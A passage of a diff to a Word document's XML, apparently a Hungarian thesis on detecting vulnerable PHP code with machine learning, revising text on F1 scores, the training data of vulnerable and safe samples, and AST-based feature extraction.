+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>actual</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> positive)</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14420,12 +16287,14 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14563,8 +16432,18 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>F-1 score</w:t>
-      </w:r>
+        <w:t xml:space="preserve">F-1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>score</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14588,6 +16467,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Az F1 pontszám a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14598,7 +16478,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">recision </w:t>
+        <w:t>recision</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14612,6 +16499,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14622,7 +16510,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ecall </w:t>
+        <w:t>ecall</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14690,24 +16585,28 @@
         </w:rPr>
         <w:t xml:space="preserve">Ennek eredményeként az osztályozó csak akkor kap magas F-1 pontszámot, ha mind a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve">, mind a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14813,6 +16712,128 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ebben a fejezetben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ismertetem</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>program</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> felépítésének lépéseit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a korábbi fejezetet alapul véve</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A 2.1-es fejezet felsorolásának legelső lépésével </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kezdnem</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, az adatgyűjtéssel.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A 102 darab tanuló kód, amely a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mappában helyezkedik el</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a gépi tanulási modellem alapja.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
@@ -14832,10 +16853,10 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A1CC2A3" wp14:editId="37E2A2E9">
-            <wp:extent cx="1541989" cy="1581150"/>
-            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
-            <wp:docPr id="16" name="Kép 16"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D7EF8D3" wp14:editId="4B1C992F">
+            <wp:extent cx="3194214" cy="482625"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+            <wp:docPr id="9" name="Kép 9"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -14843,26 +16864,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="16" name="Kép 16"/>
+                    <pic:cNvPr id="1" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13">
-                      <a:extLst>
-                        <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
-                          <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
-                            <a14:imgLayer r:embed="rId14">
-                              <a14:imgEffect>
-                                <a14:brightnessContrast bright="20000" contrast="-40000"/>
-                              </a14:imgEffect>
-                            </a14:imgLayer>
-                          </a14:imgProps>
-                        </a:ext>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -14870,7 +16876,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="1548728" cy="1588060"/>
+                      <a:ext cx="3194214" cy="482625"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -14895,37 +16901,57 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">3.1-es ábra: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>program fő mappájának felépítése</w:t>
+        <w:t>3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-es ábra: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>pdo1.php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, egy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> nem sérülékeny kód</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>tanulo_adatok</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mappában</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14939,6 +16965,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14948,37 +16975,151 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Ebben a fejezetben </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ismertetem</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>program</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> felépítésének lépéseit</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a korábbi fejezetet alapul véve</w:t>
+        <w:t>Az</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 57 darab sérülékeny és 45 darab nem sérülékeny kó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> legelső lépésben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">AST generáláson esik át, amihez az irodalomjegyzék [10] elemét használtam. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ez egy manuális folyamat volt, de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a parser.js a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>front-end</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> által bekért kódra</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ezt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> már automatizálja</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az irodalomjegyzék [11] eleme segítségével</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A PHP fájl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">okhoz generált </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST fák</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mappábában </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">közel </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>azonos névvel helyezked</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nek </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>el</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14986,69 +17127,30 @@
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>txt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kiterjesztéssel.</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A 2.1-es fejezet felsorolásának legelső lépésével </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kezdnem</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, az adatgyűjtéssel.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A 102 darab tanuló kód, amely a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mappában helyezkedik el</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a gépi tanulási modellem alapja.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="567"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15069,10 +17171,500 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D7EF8D3" wp14:editId="4B1C992F">
-            <wp:extent cx="3194214" cy="482625"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67F1A32B" wp14:editId="3C0D88AE">
+            <wp:extent cx="3791145" cy="1847945"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="10" name="Kép 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3791145" cy="1847945"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-es </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ábra: pdo1_ast.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3.1-es ábra kódjának AST megfelelője</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nodes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.py </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ezekkel dolgozik tovább</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Elsőként listázza és egy ciklussal sorra </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">beolvassa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST mappa</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>txt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kiterjesztésű fájljait</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>. M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ajd </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ezek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fájlok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nak a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sorait </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">JSON felépítésből adódó </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kulcsok alapján szelektálja</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> („</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”, „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”, „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>raw</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ezek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z értéke</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>adják a fájlok fontos szavait és kifejezéseit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, így </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
